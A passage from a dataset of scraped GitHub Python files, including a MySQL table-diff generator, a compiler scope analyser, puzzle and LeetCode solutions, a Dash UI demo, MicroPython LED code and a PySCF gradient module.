key_str, re.M|re.S)\n if matchObj:\n key_obj.type = matchObj.group(1)\n key_obj.len = matchObj.group(2)\n else:\n # 不是type(len)格式\n matchObj = re.match( r\"(.*?) 
.*\", key_str, re.M|re.S)\n key_obj.type = matchObj.group(1)\n key_obj.type = key_obj.type.strip()\n key_obj.len = 0\n \n # # re实现\n # # 字段str范围\n # matchObj = re.match( r\".*?`(.*?),\\n(.*)\", sql_str, re.M|re.S)\n # key_str = \"`\" + matchObj.group(1)\n # sql_str = matchObj.group(2)\n \n # # 获取key\n # key_obj = KeyObj()\n # key_obj.sql_str = key_str\n # matchObj = re.match( r\"`(.*?)`(.*)\", key_str, re.M|re.S)\n # key_obj.key_name = matchObj.group(1)\n # key_str = matchObj.group(2)\n \n # # 获取注释\n # matchObj = re.match( r\"(.*)COMMENT '(.*?)'(.*)\", key_str, re.M|re.S)\n # if matchObj:\n # key_obj.comment = matchObj.group(2)\n # key_str = matchObj.group(1) + matchObj.group(3)\n \n # # 获取默认值\n # matchObj = re.match( r\"(.*)DEFAULT '(.*?)'(.*)\", key_str, re.M|re.S)\n # if matchObj:\n # key_obj.default = matchObj.group(2)\n # key_str = matchObj.group(1) + matchObj.group(3)\n \n # # 获取是否不为空\n # matchObj = re.match( r\"(.*)NOT NULL(.*)\", key_str, re.M|re.S)\n # if matchObj:\n # key_obj.not_null = \"NOT NULL\"\n # key_str = matchObj.group(1) + matchObj.group(2)\n \n # # 获取类型和长度\n # key_str = key_str.lstrip()\n # matchObj = re.match( r\"(.*?)\\((.*?)\\).*\", key_str, re.M|re.S)\n # if matchObj:\n # key_obj.type = matchObj.group(1)\n # key_obj.len = matchObj.group(2)\n # else:\n # # 不是type(len)格式\n # matchObj = re.match( r\"(.*?) .*\", key_str, re.M|re.S)\n # key_obj.type = matchObj.group(1)\n # key_obj.type = key_obj.type.strip()\n # key_obj.len = 0\n \n # 添加到table_obj\n table_obj.key_map[key_obj.key_name] = key_obj\n print(\"key_map:%s\"%(table_obj.key_map.keys()))\n return sql_str\n\n# 获取键\ndef get_table_key(table_obj, sql_str):\n # 获取主键\n matchObj = re.match( r\"(.*)PRIMARY KEY \\((.*?)\\)(.*)\", sql_str, re.M|re.S)\n if matchObj:\n index_obj = IndexObj()\n primary_key = matchObj.group(2)\n primary_key = primary_key.replace(\"`\",\"\")\n index_obj.field = primary_key.split(\",\")\n index_obj.field = list_del_blank(index_obj.field)\n table_obj.primary_key = index_obj\n sql_str = matchObj.group(1) + matchObj.group(3)\n # 获取联合键\n while True:\n matchObj = re.match( r\"(.*)UNIQUE KEY `(.*?)` \\((.*?)\\)(.*)\", sql_str, re.M|re.S)\n if matchObj:\n index_obj = IndexObj()\n index_obj.name = matchObj.group(2)\n unique_key = matchObj.group(3)\n unique_key = unique_key.replace(\"`\",\"\")\n index_obj.field = unique_key.split(\",\")\n index_obj.field = list_del_blank(index_obj.field)\n table_obj.unique_key[index_obj.name] = index_obj\n sql_str = matchObj.group(1) + matchObj.group(4)\n else:\n break\n # 获取普通键\n while True :\n matchObj = re.match( r\"(.*)KEY `(.*?)` \\(`(.*?)`\\)(.*)\", sql_str, re.M|re.S)\n if matchObj:\n index_obj = IndexObj()\n index_obj.name = matchObj.group(2)\n key_list = matchObj.group(3)\n key_list = key_list.replace(\"`\",\"\")\n index_obj.field = key_list.split(\",\")\n index_obj.field = list_del_blank(index_obj.field)\n table_obj.ordinary_key[index_obj.name] = index_obj\n sql_str = matchObj.group(1) + matchObj.group(4)\n else:\n break\n\n# 生成两个表的差异sql, 第一个表为主\ndef table_diff(new_table, old_table):\n sql_str = \"\"\n table_name = new_table.table_name\n # 添加和修改的字段\n for key_name in new_table.key_map:\n new_key_obj:KeyObj = new_table.key_map[key_name]\n # 是否新字段\n if key_name not in old_table.key_map:\n sql_str += \"ALTER TABLE %s ADD \"%(table_name)\n sql_str += (key_obj_get_sql(new_key_obj))\n else:\n # 字段存在\n # 检查差异\n old_key_obj = old_table.key_map[key_name]\n # 字段类型和长度\n # or new_key_obj.not_null != old_key_obj.not_null \\\n if new_key_obj.type.lower() != 
old_key_obj.type.lower() \\\n or new_key_obj.len != old_key_obj.len \\\n or new_key_obj.default.lower() != old_key_obj.default.lower() \\\n or new_key_obj.unsigned != old_key_obj.unsigned \\\n or new_key_obj.comment != old_key_obj.comment:\n sql_str += (\"ALTER TABLE %s MODIFY \"%(table_name) + key_obj_get_sql(new_key_obj))\n # 删除的字段\n for key_name in old_table.key_map:\n if key_name not in new_table.key_map:\n sql_str += (\"ALTER TABLE %s DROP %s;\\n\")%(table_name, key_name)\n \n # 索引\n # 主键\n primary_key_sql = \"\"\n new_primary_key = new_table.primary_key\n old_primary_key = old_table.primary_key\n if not new_primary_key and not old_primary_key:\n # 新表,旧表主键都不存在\n pass\n elif new_primary_key and not old_primary_key:\n # 新表主键存在 旧表主键不存在\n # 添加主键\n primary_key_str = \",\".join(new_primary_key.field)\n primary_key_sql = \"ALTER TABLE {0} ADD PRIMARY KEY ({1});\\n\".format(\n table_name\n , primary_key_str\n )\n elif new_primary_key and old_primary_key:\n # 新表主键存在 旧表主键也存在\n if not list_is_same(new_primary_key.field, old_primary_key.field):\n # 主键不一致\n primary_key_sql = \"ALTER TABLE {0} DROP PRIMARY KEY;\\n\".format(table_name)\n primary_key_str = \",\".join(new_primary_key.field)\n primary_key_sql += \"ALTER TABLE {0} ADD PRIMARY KEY ({1});\\n\".format(\n table_name\n , primary_key_str\n )\n elif not new_primary_key and old_primary_key:\n # 新表主键不存在 旧表主键存在\n primary_key_sql = \"ALTER TABLE {0} DROP PRIMARY KEY;\\n\".format(table_name)\n sql_str += primary_key_sql\n \n # 联合键\n # 添加和修改的键\n new_unique_key = new_table.unique_key\n old_unique_key = old_table.unique_key\n for tmp_key in new_unique_key:\n unique_key_str = \",\".join(new_unique_key[tmp_key].field)\n if tmp_key not in old_unique_key:\n # 旧表不存在\n sql_str += \"ALTER TABLE {0} ADD UNIQUE {1}({2});\\n\".format(table_name, tmp_key, unique_key_str)\n elif not list_is_same(old_unique_key[tmp_key].field, new_unique_key[tmp_key].field):\n # 键存在,但值不一致\n sql_str += \"ALTER TABLE {0} DROP INDEX {1};\\n\".format(table_name, tmp_key)\n sql_str += \"ALTER TABLE {0} ADD UNIQUE {1}({2});\\n\".format(table_name, tmp_key, unique_key_str)\n # 删除的键\n for tmp_key in old_unique_key:\n if tmp_key not in new_unique_key:\n sql_str += \"ALTER TABLE {0} DROP INDEX {1};\\n\".format(table_name, tmp_key)\n \n # 普通键\n new_ordinary_key = new_table.ordinary_key\n old_ordinary_key = old_table.ordinary_key\n for tmp_key in new_ordinary_key:\n ordinary_key_str = \",\".join(new_ordinary_key[tmp_key].field)\n if tmp_key not in old_ordinary_key:\n # 旧表不存在\n sql_str += \"ALTER TABLE {0} ADD INDEX {1}({2});\\n\".format(table_name, tmp_key, ordinary_key_str)\n elif not list_is_same(old_ordinary_key[tmp_key].field, new_ordinary_key[tmp_key].field):\n # 键存在,但值不一致\n sql_str += \"ALTER TABLE {0} DROP INDEX {1};\\n\".format(table_name, tmp_key)\n sql_str += \"ALTER TABLE {0} ADD INDEX {1}({2});\\n\".format(table_name, tmp_key, ordinary_key_str)\n # 删除的键\n for tmp_key in old_ordinary_key:\n if tmp_key not in new_ordinary_key:\n sql_str += \"ALTER TABLE {0} DROP INDEX {1};\\n\".format(table_name, tmp_key)\n \n # 表的属性\n # 暂时不考虑改这个\n return sql_str\n\n# 获取字段类对应sql\ndef key_obj_get_sql(key_obj):\n # 类型可能没有长度\n type_str = \"\"\n if key_obj.len == 0:\n type_str = key_obj.type\n else:\n type_str = \"{0}({1}) {2}\".format(key_obj.type, key_obj.len, key_obj.unsigned)\n \n sql_str = \"{0} {1} {2}\".format(\n key_obj.key_name\n , type_str\n , key_obj.not_null\n )\n # 是否有默认值\n if key_obj.default != \"\":\n sql_str += \" DEFAULT '%s'\"%(key_obj.default)\n # 是否有注释\n if key_obj.comment != \"\":\n 
sql_str += \" COMMENT '%s'\"%(key_obj.comment)\n sql_str += \";\\n\"\n return sql_str\n\n# 两个表内容是否一致,顺序不需要一致\ndef list_is_same(a_list, b_list):\n if len(a_list) != len(b_list):\n return False\n \n # 遍历元素\n for item in a_list:\n if item not in b_list:\n return False\n return True\n\n# 字符串列表删除字符串空白\ndef list_del_blank(list):\n new_list = []\n for tmp in list:\n tmp = tmp.strip()\n new_list.append(tmp)\n return new_list\n\n# 获取两个字符串间的字符串\ndef get_str_by_begin_end(sql_str:str, begin_str:str, end_str:str):\n begin_idx = sql_str.find(begin_str)\n if begin_idx == -1:\n return \"\",sql_str\n begin_idx = begin_idx + len(begin_str)\n end_idx = sql_str.find(end_str, begin_idx)\n if end_idx == -1:\n return \"\",sql_str\n else:\n return sql_str[begin_idx : end_idx], sql_str[end_idx:]","repo_name":"huangwenzi/mysql_diff","sub_path":"db_tool.py","file_name":"db_tool.py","file_ext":"py","file_size_in_byte":15501,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"2033819149","text":"import bs4\nimport re\nfrom urllib.request import urlopen\nimport favicon\n\n\ndef get_data_by_url(url):\n try:\n html = urlopen(url)\n except:\n return None\n soup = bs4.BeautifulSoup(html, 'html.parser')\n text = re.sub(r'\\s+', ' ', soup.get_text())\n icon = favicon.get(url)[0][0]\n title = soup.title.text\n return {'text': text, 'icon': icon, 'title': title}\n","repo_name":"kesha787898/LHD","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":384,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"13179740144","text":"#!/usr/bin/python3\n\nfrom constants import *\nfrom grammar import GrammarDriver\nfrom grammar_rules import rules\nfrom parse_tree import ParseTreeVisitor, VariableExpression, ArrayIndexExpression, FunctionCall, FormalParameter\nfrom parser import Parser\nfrom scanner import Scanner\nfrom type_enums import VariableType, ScopeType\nfrom variable import Variable, FunctionVariable, BuiltinFunctionVariable, Function\nfrom util import print_debug\n\nfrom enum import Enum\n\nclass ScopeError(BaseException):\n def __init__(self, message, pos = None):\n self.message = message\n self.pos = pos\n\n\nclass Scope:\n def __init__(self, scope_type, parent=None):\n self.scope_type = scope_type\n self.parent = parent\n # [Variable]. The variables are gathered as a list, because we want to keep\n # them in order (for simplicity; we also want to always allocate the\n # variables in the same order to be deterministic).\n self.variables = []\n self.children = []\n\n def __getVariable(self, name):\n for v in self.variables:\n if v.name == name:\n return v\n return None\n\n def addVariable(self, variable):\n # print_debug(\"Adding variable \" + str(variable) + \" to scope \" + str(self))\n if self.__getVariable(variable.name):\n return False\n # Allow shadowing; here we explicitly don't care if some parent declares the\n # same variable. So, a variable in an if scope can shadow a variable in a\n # function.\n self.variables.append(variable)\n return True\n\n def resolve(self, name):\n # print(\"Resolving variable \" + str(name) + \" in scope \" + str(self))\n v = self.__getVariable(name)\n if v:\n return v\n # print(\"Not found, going to parent...\")\n if self.parent:\n return self.parent.resolve(name)\n return None\n\n # FIXME: add printing, add scope locations.\n\n# Base class for a parse tree visitor which knows about scopes. 
It either\n# creates them if the scopes don't exist, or keeps track of already created\n# scopes while walking.\nclass ScopeAnalyserVisitor(ParseTreeVisitor):\n def __init__(self, top_scope):\n super().__init__()\n self.scopes = [top_scope]\n\n def visitIfStatementBeginBody(self, statement):\n # Here we'd really like to use a pointer to the member variable, so that\n # __pushScope could assign the scope it creates into the right place.\n self.__pushScope(statement.if_scope, ScopeType.sub)\n statement.if_scope = self.scopes[0]\n\n def visitIfStatementEndBody(self, statement):\n self.__popScope()\n\n def visitIfStatementBeginElse(self, statement):\n self.__pushScope(statement.else_scope, ScopeType.sub)\n statement.else_scope = self.scopes[0]\n\n def visitIfStatementEndElse(self, statement):\n self.__popScope()\n\n def visitWhileStatementBeginBody(self, statement):\n self.__pushScope(statement.scope, ScopeType.sub)\n statement.scope = self.scopes[0]\n\n def visitWhileStatementEndBody(self, statement):\n self.__popScope()\n\n def visitFunctionStatementBeginBody(self, statement):\n self.__pushScope(statement.function.scope, ScopeType.function)\n statement.function.scope = self.scopes[0]\n\n def visitFunctionStatementEndBody(self, statement):\n self.__popScope()\n\n def currentScopeType(self):\n # Are we inside a function scope or on the top scope?\n for scope in self.scopes:\n if scope.scope_type is not ScopeType.sub:\n return scope.scope_type\n assert(False)\n\n def currentVariableAllocationScope(self):\n # Returns the innermost scope which is either function or top (not\n # sub). That's the scope where the variables will be allocated.\n for scope in self.scopes:\n if scope.scope_type is not ScopeType.sub:\n return scope\n assert(False)\n\n def currentFunctionScope(self):\n # Returns the innermost scope which is either function or top (not\n # sub). 
That's the scope where the variables will be allocated.\n for scope in self.scopes:\n if scope.scope_type == ScopeType.function:\n return scope\n return None\n\n def __pushScope(self, scope, scope_type):\n if scope is None:\n scope = Scope(scope_type, self.scopes[0])\n # print_debug(\"push scope \" + str(scope))\n self.scopes[0].children += [scope] # FIXME: reverse the stack, this is silly\n self.scopes = [scope] + self.scopes\n\n def __popScope(self):\n # print_debug(\"pop scope \" + str(self.scopes[0]))\n self.scopes.pop(0)\n\n\n# Creates scopes and puts functions into them.\nclass FirstPassScopeAnalyser(ScopeAnalyserVisitor):\n def __init__(self, top_scope, main_function):\n super().__init__(top_scope)\n # print_debug(\"top scope is \" + str(top_scope))\n self.__function_stack = [main_function]\n\n def visitFunctionStatement(self, s):\n # Add the function variable into the surrounding scope.\n # print_debug(\"Adding function variable \" + s.name + \" into scope \" + str(self.scopes[0]))\n name = \"\"\n for f in self.__function_stack:\n if len(name) > 0:\n name += \"__\"\n name += f.name\n unique_name = name + \"__\" + s.name\n v = FunctionVariable(s.name, unique_name, self.currentVariableAllocationScope(), s)\n if not self.scopes[0].addVariable(v):\n raise ScopeError(\"ScopeError: redeclaration of variable \" + s.name, s.pos)\n s.resolved_function = v\n f = Function(v)\n\n f.outer_function = self.__function_stack[-1]\n # print_debug(\"function \" + str(f) + \" outer function is \" + str(f.outer_function))\n f.name = s.name\n\n self.__function_stack.append(f)\n s.function = f\n\n # This will create the scope for the function.\n super().visitFunctionStatement(s)\n self.__function_stack.pop()\n\n\n\n# Uses the scopes created by FirstPassScopeAnalyser, puts variables into them\n# and resolves variables (incl. 
function calls).\nclass SecondPassScopeAnalyser(ScopeAnalyserVisitor):\n def __init__(self, top_scope):\n super().__init__(top_scope)\n\n @staticmethod\n def __addVariablesFromScopeChainToFunction(function, scope):\n for v in scope.variables:\n function.addVariable(v)\n for s in scope.children:\n if s.scope_type != ScopeType.function:\n SecondPassScopeAnalyser.__addVariablesFromScopeChainToFunction(function, s)\n\n def visitLetStatement(self, s):\n super().visitLetStatement(s)\n v = Variable(s.identifier, s.ttype, VariableType.variable, self.currentVariableAllocationScope())\n # print(\"Adding normal variable \" + s.identifier + \" into scope \" + str(self.scopes[0]))\n if not self.scopes[0].addVariable(v):\n raise ScopeError(\"ScopeError: redeclaration of variable \" + s.identifier, s.pos)\n s.resolved_variable = v\n\n def visitAssignmentStatement(self, s):\n super().visitAssignmentStatement(s)\n\n self.__visitVariableExpressionOrArrayIndexExpressionOrFunctionCall(s.where)\n\n def __visitVariableExpressionOrArrayIndexExpressionOrFunctionCall(self, e):\n if isinstance(e, VariableExpression):\n self.visitVariableExpression(e)\n elif isinstance(e, ArrayIndexExpression):\n self.visitArrayIndexExpression(e)\n elif isinstance(e, FunctionCall):\n self.visitFunctionCall(e)\n else:\n assert(False)\n\n def visitVariableExpression(self, e):\n v = self.scopes[0].resolve(e.name)\n if not v:\n raise ScopeError(\"ScopeError: undeclared variable \" + e.name, e.pos)\n e.resolved_variable = v\n if v.allocation_scope.scope_type == ScopeType.function and v.allocation_scope != self.currentFunctionScope():\n v.referred_by_inner_functions = True\n\n def visitArrayIndexExpression(self, e):\n self.__visitVariableExpressionOrArrayIndexExpressionOrFunctionCall(e.array)\n e.index.accept(self)\n\n def visitFunctionStatementEndBody(self, s):\n super().visitFunctionStatementEndBody(s)\n\n # Gather all local variables for the function (they might be directly in the\n # function scope or in subscopes (for while, if etc.).\n\n # For simplicity, we treat all variables the same, that is, allocate all\n # variables in the function context. 
A possible optimization is to stack\n # allocate variables which are not referred to by the inner functions.\n\n # FIXME: optimize so that variables which are not live at the same time can\n # share the space.\n SecondPassScopeAnalyser.__addVariablesFromScopeChainToFunction(s.function, s.function.scope)\n\n def visitFunctionCall(self, s):\n super().visitFunctionCall(s)\n\n self.__visitVariableExpressionOrArrayIndexExpressionOrFunctionCall(s.function)\n\n # We cannot check parameter count here, because we might be calling a\n # function via a variable!\n\n def visitFunctionStatementParameters(self, s):\n # TODO: parameters need to keep track of which functions they are a parameter to.\n super().visitFunctionStatementParameters(s)\n for p in s.formal_parameters.items:\n assert(isinstance(p, FormalParameter))\n assert(s.function.scope)\n v = Variable(p.name, p.ttype, VariableType.variable, s.function.scope, True)\n # Note that parameter can also be referred to by inner functions.\n if not self.scopes[0].addVariable(v):\n raise ScopeError(\"ScopeError: redeclaration of variable \" + p.name, s.pos)\n\n def visitNewExpression(self, e):\n super().visitNewExpression(e)\n self.visitFunctionCall(e.function_call)\n\n\nclass ScopeAnalyser:\n def __init__(self, parse_tree):\n self.__parse_tree = parse_tree\n self.builtins = set()\n\n def analyse(self):\n self.top_scope = Scope(ScopeType.top)\n self.__parse_tree.main_function.scope = self.top_scope\n\n for b in self.builtins:\n self.top_scope.addVariable(BuiltinFunctionVariable(b, self.top_scope))\n\n v1 = FirstPassScopeAnalyser(self.top_scope, self.__parse_tree.main_function)\n v2 = SecondPassScopeAnalyser(self.top_scope)\n try:\n v1.visitProgram(self.__parse_tree)\n v2.visitProgram(self.__parse_tree)\n self.success = True\n except ScopeError as e:\n self.success = False\n self.error = e\n","repo_name":"marjakh/SillyLittleCompiler","sub_path":"src/scope_analyser.py","file_name":"scope_analyser.py","file_ext":"py","file_size_in_byte":9853,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"9602881972","text":"#!/usr/bin/env python\n# coding=UTF-8\n'''\n@Description: About practicing python exercises\n@Author: Shenhongwen\n@LastEditors: Shenhongwen\n@Date: 2019-02-28 21:01:03\n@LastEditTime: 2019-02-28 21:03:41\n'''\n\n\ndef output(s, length):\n if length == 0:\n return\n print(s[length-1])\n output(s, length-1)\n\n\ns = input('Input a string:')\nlength = len(s)\noutput(s, length)\n","repo_name":"hongwenshen/Python_Study","sub_path":"Python 100例/Python 练习实例27.py","file_name":"Python 练习实例27.py","file_ext":"py","file_size_in_byte":374,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"74940478289","text":"from functools import lru_cache\nfrom hashlib import md5\nimport itertools as it\nimport re\n\n\n@lru_cache(maxsize=50_000)\ndef get_hash(s: str, rounds: int = 0) -> str:\n for _ in range(rounds + 1):\n s = md5(s.encode(\"utf-8\")).hexdigest()\n return s\n\n\ndef solve(rounds):\n three = re.compile(r\"(.)\\1{2}\")\n keys = []\n salt = \"cuanljph\"\n found = False\n for step in it.count(0):\n if found:\n break\n index = salt + str(step)\n match = re.search(three, get_hash(index, rounds=rounds))\n if match:\n five = re.compile(match[1] + r\"{5}\")\n for sub_step in range(step + 1, step + 1_001):\n index = salt + str(sub_step)\n match = re.search(five, get_hash(index, rounds=rounds))\n if match:\n keys.append(step)\n if len(keys) == 64:\n 
found = True\n break\n\n return step - 1\n\n\nprint(\"answer 1:\", solve(0))\nprint(\"answer 2:\", solve(2016))\n","repo_name":"daniel70/AoC","sub_path":"2016/day14.py","file_name":"day14.py","file_ext":"py","file_size_in_byte":1024,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"36634901860","text":"#!/usr/bin/env python3\r\n# -*- coding: utf-8 -*-\r\n\"\"\"\r\nSource: https://www.datacamp.com/community/tutorials/learn-build-dash-python\r\nCore Components:\r\n Dropdown\r\n Multi-Select Dropdown\r\n Ratio Items\r\n Checklist\r\n Text Input\r\nHelp:\r\n help(dcc.Slider)\r\n\"\"\"\r\n\r\nexternal_stylesheets = [\r\n 'https://codepen.io/chriddyp/pen/bWLwgP.css',\r\n 'https://fonts.googleapis.com/css?family=Roboto&display=swap' # to load the 'Roboto' font\r\n ]\r\n\r\n# # # Core Components # # #\r\n\r\nimport dash\r\nimport dash_core_components as dcc # it has the Graph class\r\nimport dash_html_components as html # it has all the HTML tags\r\n\r\nbold_label = lambda x: html.Label(x, style={'fontWeight': 'bold'})\r\n\r\napp = dash.Dash(__name__, external_stylesheets=external_stylesheets)\r\n\r\noptions_list = [\r\n {'label': 'New York City', 'value': 'NYC'},\r\n {'label': 'Montréal', 'value': 'MTL'},\r\n {'label': 'San Francisco', 'value': 'SF'}\r\n]\r\n\r\napp.layout = html.Div(style={'fontFamily': \"'Roboto', sans-serif;\", 'columnCount': 2}, children=[\r\n html.Div([\r\n bold_label('Dropdown'),\r\n dcc.Dropdown(\r\n options = options_list,\r\n value = 'MTL'\r\n )\r\n ]),\r\n html.Div([\r\n bold_label('Multi-Select Dropdown'),\r\n dcc.Dropdown(\r\n options = options_list,\r\n value = ['MTL', 'SF'],\r\n multi = True\r\n )\r\n ]),\r\n html.Div([\r\n bold_label('Radio Items'),\r\n dcc.RadioItems(\r\n options = options_list,\r\n value = 'MTL',\r\n ),\r\n ]),\r\n html.Div([\r\n bold_label('Checklist'),\r\n dcc.Checklist(\r\n options = options_list,\r\n value = ['MTL', 'SF']\r\n )\r\n ],\r\n style={'overflow': 'hidden'} # to avoid braking across columns \r\n ),\r\n html.Div([\r\n bold_label('Text Box'),\r\n html.Div(dcc.Input(value = 'MTL', type = 'text')),\r\n ]),\r\n html.Div([\r\n bold_label('Slider'),\r\n dcc.Slider(\r\n id='my-slider',\r\n min=0,\r\n max=10,\r\n step=0.5,\r\n value=5,\r\n marks={\r\n 0: '0',\r\n 5: '5',\r\n 10: '10'\r\n }\r\n )\r\n ]),\r\n html.Div(id='slider-output-container')\r\n])\r\n\r\n@app.callback(\r\n dash.dependencies.Output('slider-output-container', 'children'),\r\n [dash.dependencies.Input('my-slider', 'value')])\r\ndef update_output(value):\r\n return f\"You have selected {value}\"\r\n\r\n\r\nif __name__ == '__main__':\r\n app.run_server(debug=True)","repo_name":"eltrujo/dash_basics","sub_path":"core_components.py","file_name":"core_components.py","file_ext":"py","file_size_in_byte":2556,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"28351162532","text":"import time\nimport machine\n\n\npin_white_cold = machine.PWM(machine.Pin(5))\npin_white_warm = machine.PWM(machine.Pin(13))\npin_r = machine.PWM(machine.Pin(4))\npin_g = machine.PWM(machine.Pin(12))\npin_b = machine.PWM(machine.Pin(14))\nall_pwm_pins = (pin_r, pin_g, pin_b, pin_white_warm, pin_white_cold)\n\nCOLOUR_RANGE = (0, 255)\nPWM_RANGE = (0, 768)\n\n\ndef map(value, from_range, to_range):\n return int(\n to_range[0] + \\\n (((value - from_range[0]) / (from_range[1] - from_range[0])) * \\\n (to_range[1] - to_range[0]))\n )\n\n\ndef set_all(red, green, blue, white_cold, 
white_warm):\n print((red, green, blue, white_cold, white_warm))\n pin_r.duty(map(red, COLOUR_RANGE, PWM_RANGE))\n pin_g.duty(map(green, COLOUR_RANGE, PWM_RANGE))\n pin_b.duty(map(blue, COLOUR_RANGE, PWM_RANGE))\n pin_white_cold.duty(map(white_cold, COLOUR_RANGE, PWM_RANGE))\n pin_white_warm.duty(map(white_warm, COLOUR_RANGE, PWM_RANGE))\n\n\ndef off():\n for pwm_pin in all_pwm_pins:\n pwm_pin.duty(0)\n\n\ndef flash_pwm():\n off()\n\n for pwm_pin in all_pwm_pins:\n for i in range(1024):\n pwm_pin.duty(i)\n time.sleep(0.001)\n for i in reversed(range(1024)):\n pwm_pin.duty(i)\n time.sleep(0.001)\n\n\ndef flash():\n off()\n\n for pwm_pin in all_pwm_pins:\n pwm_pin.duty(1024)\n time.sleep(1)\n pwm_pin.duty(0)\n","repo_name":"carlosperate/micropython-lightbulb","sub_path":"src/leds.py","file_name":"leds.py","file_ext":"py","file_size_in_byte":1400,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"1633813601","text":"import unittest\nfrom XiangqiGame import XiangqiGame\n\nclass TestCase(unittest.TestCase):\n # TESTS \n def test1(self):\n game = XiangqiGame()\n\n # While game state == \"UNFINISHED\"\n # choose a random red piece \n # of available moves, call make move for move \n # choose a random black piece \n # of available moves, call make move for move\n\n self.assertEqual(location, expected)\n\n\nif __name__ == '__main__':\n unittest.main()","repo_name":"EMcKague/Xiangqi","sub_path":"tests_Checkmate.py","file_name":"tests_Checkmate.py","file_ext":"py","file_size_in_byte":483,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"1185261414","text":"# 1219. 黄金矿工\n# https://leetcode-cn.com/problems/path-with-maximum-gold/\n\nfrom typing import List\nimport copy\n\n\nclass Solution:\n def getMaximumGold(self, grid: List[List[int]]) -> int:\n\n def dfs(grid, i, j, gold) -> int:\n if i < 0 or i >= len(grid) or j < 0 or j >= len(grid[0]) or grid[i][j] <= 0:\n return gold\n\n gold += grid[i][j]\n grid[i][j] = -grid[i][j]\n\n m = max([dfs(grid, i + 1, j, gold),\n dfs(grid, i - 1, j, gold),\n dfs(grid, i, j + 1, gold),\n dfs(grid, i, j - 1, gold)])\n grid[i][j] = -grid[i][j]\n return m\n\n ans = 0\n for i in range(len(grid)):\n for j in range(len(grid[0])):\n newGrid = copy.deepcopy(grid)\n t = dfs(newGrid, i, j, 0)\n ans = max(ans, t)\n return ans\n\n\nif __name__ == \"__main__\":\n solution = Solution()\n print(solution.getMaximumGold(\n [[1, 0, 7, 0, 0, 0],\n [2, 0, 6, 0, 1, 0],\n [3, 5, 6, 7, 4, 2],\n [4, 3, 1, 0, 2, 0],\n [3, 0, 5, 0, 20, 0]]\n ))\n","repo_name":"KevenGe/LeetCode-Solutions","sub_path":"problemset/1219. 
黄金矿工/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1154,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"7469900343","text":"class Solution:\n def shuffle(self, nums: List[int], n: int) -> List[int]:\n nums2 = []\n for i in range(len(nums)//2,len(nums)):\n nums2.append(nums[i])\n \n \n final = []\n for i in range(len(nums2)):\n final.append(nums[i])\n final.append(nums2[i])\n \n return final\n","repo_name":"MainakRepositor/MyLeetPy","sub_path":"5.py","file_name":"5.py","file_ext":"py","file_size_in_byte":354,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"66"} +{"seq_id":"11552169025","text":"import cv2\nfrom cryptography.fernet import Fernet\nimport numpy as np\n\n# Load the QR code image from file\nqr_code_image = cv2.imread(\"qr_code.png\")\n\n# Create a QR code detector object\nqr_code_detector = cv2.QRCodeDetector()\n\n# Detect and decode the QR code\ndata, bbox, straight_qrcode = qr_code_detector.detectAndDecode(qr_code_image)\n\n# Print the decoded data\nprint(data)\nprint(data.split('||')[0])\nprint(data.split('||')[1])\nprint(data.split('||')[2])\n# Load the key from a file or generate a new one\nwith open('key1.key', 'rb') as file:\n key = file.read()\n\n# Create a Fernet object with the key\nfernet = Fernet(key)\n\n# Decrypt the encrypted data\ndecrypted_data = fernet.decrypt(data.split('||')[0])\ndecrypted_data1 = fernet.decrypt(data.split('||')[1])\n# Print the decrypted data\nprint(decrypted_data.decode()) \nprint(decrypted_data1.decode())\n\n","repo_name":"Kapil0021/computing_project","sub_path":"qr/finalQr/readqrco.py","file_name":"readqrco.py","file_ext":"py","file_size_in_byte":851,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"32604867602","text":"from mrh.my_pyscf.grad import mcpdft as mcpdft_grad\nfrom mrh.my_pyscf.df.grad import dfsacasscf as dfsacasscf_grad\nfrom mrh.my_pyscf.df.grad import rhf as dfrhf_grad\n\n# I need to resolve the __init__ and get_ham_response members. Otherwise everything should be fine! 
\nclass Gradients (dfsacasscf_grad.Gradients, mcpdft_grad.Gradients):\n \n def __init__(self, pdft):\n self.auxbasis_response = True\n mcpdft_grad.Gradients.__init__(self, pdft)\n\n def get_ham_response (self, state=None, atmlst=None, verbose=None, mo=None, ci=None, eris=None, mf_grad=None, veff1=None, veff2=None, **kwargs):\n if state is None: state = self.state\n if atmlst is None: atmlst = self.atmlst\n if verbose is None: verbose = self.verbose\n if mo is None: mo = self.base.mo_coeff\n if ci is None: ci = self.base.ci\n if (veff1 is None) or (veff2 is None):\n assert (False), kwargs\n veff1, veff2 = self.base.get_pdft_veff (mo, ci[state], incl_coul=True, paaa_only=True)\n fcasscf = self.make_fcasscf (state)\n fcasscf.mo_coeff = mo\n fcasscf.ci = ci[state]\n return mcpdft_grad.mcpdft_HellmanFeynman_grad (fcasscf, self.base.otfnal, veff1, veff2, mo_coeff=mo, ci=ci[state], atmlst=atmlst, mf_grad=mf_grad, verbose=verbose, auxbasis_response=self.auxbasis_response)\n\n def kernel (self, **kwargs):\n if not ('mf_grad' in kwargs):\n kwargs['mf_grad'] = dfrhf_grad.Gradients (self.base._scf)\n return mcpdft_grad.Gradients.kernel (self, **kwargs)\n\n get_wfn_response = mcpdft_grad.Gradients.get_wfn_response\n get_init_guess = mcpdft_grad.Gradients.get_init_guess\n project_Aop = 